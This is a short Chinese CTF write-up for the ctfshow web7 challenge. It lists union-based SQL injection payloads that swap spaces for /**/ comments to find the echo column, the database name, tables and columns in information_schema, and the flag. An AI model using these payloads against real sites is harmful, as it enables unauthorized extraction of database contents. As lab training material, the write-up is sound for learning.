当前位置: 首页 > news >正文

ctfshow WEB web7

news 2025/7/2 2:25:01

访问页面是这样的,随便点开一个页面发现 URL 里面有一个参数 id,这十有八九就是 SQL注入了

经过不断尝试......

查看回显位置

-1/**/union/**/select/**/1,2,3

查看数据库名

-1/**/union/**/select/**/1,database(),3

查看库中表名

-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3

查看表中列名

-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name="flag"),3

查看列下数据

-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3

http://www.dtcms.com/a/92227.html

相关文章:

  • redis配置文件解析
  • oracle密码过期 ORA-28001解决方案: the password has expired
  • Linux学习笔记(应用篇三)
  • Java 大视界 -- 基于 Java 的大数据分布式系统的监控与运维实践(155)
  • RustDesk部署到linux(自建服务器)
  • Win11+VS2022+CGAL5.6配置
  • 自然语言处理NLP-文本预处理
  • nodejs-原型污染链
  • 4.Matplotlib:基础绘图
  • QT自运行程序
  • 在 VMware Workstation 17 中安装的 Ubuntu 虚拟机无法使用桥接模式
  • 【FDTD Solutions仿真入门及应用】
  • 【高项】信息系统项目管理师(十二)项目干系人管理【3分】
  • 《云原生安全攻防》-- K8s容器安全:权限最小化与SecurityContext
  • 洪水灌溉算法 + 总结
  • shelljs:理解ShellJS / 安装引入 / 常见方法 / 优势 / 应用场景
  • JVM 为什么不使用引用计数算法?——深入解析 GC 策略
  • 无人机无刷电机工作原理与技术要点
  • C语言中的指针高级运用
  • 5种生成模型(VAE、GAN、AR、Flow 和 Diffusion)的对比梳理 + 易懂讲解 + 代码实现
  • 2025-03-26 学习记录--C/C++-PTA 6-3 求链式表的表长
  • mysql语句 聚合+分组+内外链接
  • element与elementplus入门
  • 什么是 Promise?
  • Unity 管线简单讲解
  • 【谷粒商城踩坑记】第五坑 拖拽组件三级菜单拖不了问题
  • 在Cesium中使用ThreeJs材质(不是场景融合哦)
  • 运维网络排查工具介绍与使用
  • 《Android低内存设备性能优化实战:深度解析Dalvik虚拟机参数调优》
  • 1963. 使字符串平衡的最小交换次数